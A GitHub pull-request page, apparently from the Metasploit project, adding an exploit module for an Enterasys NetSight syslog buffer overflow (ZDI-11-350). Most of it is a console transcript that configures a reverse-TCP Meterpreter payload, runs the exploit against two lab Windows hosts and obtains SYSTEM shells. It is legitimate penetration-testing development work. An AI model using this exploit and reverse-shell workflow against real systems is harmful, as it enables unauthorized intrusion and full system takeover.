Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added module for ZDI-11-350 #1233

Merged
merged 3 commits into from Jan 3, 2013
Merged

Added module for ZDI-11-350 #1233

merged 3 commits into from Jan 3, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Tested with Enterasys NetSight 4.0.1.34 on Windows XP SP3 and Windows 2003 SP2

msf  exploit(enterasys_netsight_syslog_bof) > reload
[*] Reloading module...
msf  exploit(enterasys_netsight_syslog_bof) > show options

Module options (exploit/windows/misc/enterasys_netsight_syslog_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.146    yes       The target address
   RPORT  514              yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Enterasys NetSight 4.0.1.34 / Windows 2003 SP2


msf  exploit(enterasys_netsight_syslog_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Enterasys NetSight 4.0.1.34 / Windows XP SP3
   1   Enterasys NetSight 4.0.1.34 / Windows 2003 SP2


msf  exploit(enterasys_netsight_syslog_bof) > set target 1
target => 1
msf  exploit(enterasys_netsight_syslog_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.146:514 - Trying to exploit Enterasys NetSight 4.0.1.34 / Windows 2003 SP2...
[*] Sending stage (752128 bytes) to 192.168.1.146
[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.146:3321) at 2013-01-03 17:26:14 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.146 - Meterpreter session 4 closed.  Reason: User exit
msf  exploit(enterasys_netsight_syslog_bof) > set target 0
target => 0
msf  exploit(enterasys_netsight_syslog_bof) > set rhost 192.168.1.145
rhost => 192.168.1.145
msf  exploit(enterasys_netsight_syslog_bof) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.145:514 - Trying to exploit Enterasys NetSight 4.0.1.34 / Windows XP SP3...
[*] Sending stage (752128 bytes) to 192.168.1.145
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.145:2839) at 2013-01-03 17:27:46 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.145 - Meterpreter session 5 closed.  Reason: User exit
msf  exploit(enterasys_netsight_syslog_bof) >

@wchen-r7 wchen-r7 merged commit a0b4045 into rapid7:master Jan 3, 2013
@wchen-r7 wchen-r7 mentioned this pull request Jul 4, 2013
Closed
wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request Jul 11, 2013
@wchen-r7
[SeeRM:rapid7#1233] - Upgrade smb_enumshares to show directories & files
3e229fe 
[SeeRM:rapid7#1233] - This is an upgrade based on ringt's code in PR rapid7#2017.
As a pentester, it's useful to obtain additional information such as
device type, access rights, folders, and files, etc when doing a share
enumeration.  I have also enhanced exception handling to avoid shutting
errors up, which is better for debugging purposes.
@wchen-r7 wchen-r7 mentioned this pull request Jul 11, 2013
Merged
@jvazquez-r7 jvazquez-r7 deleted the enterasys_netsight_syslog_bof branch November 18, 2014 15:46
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7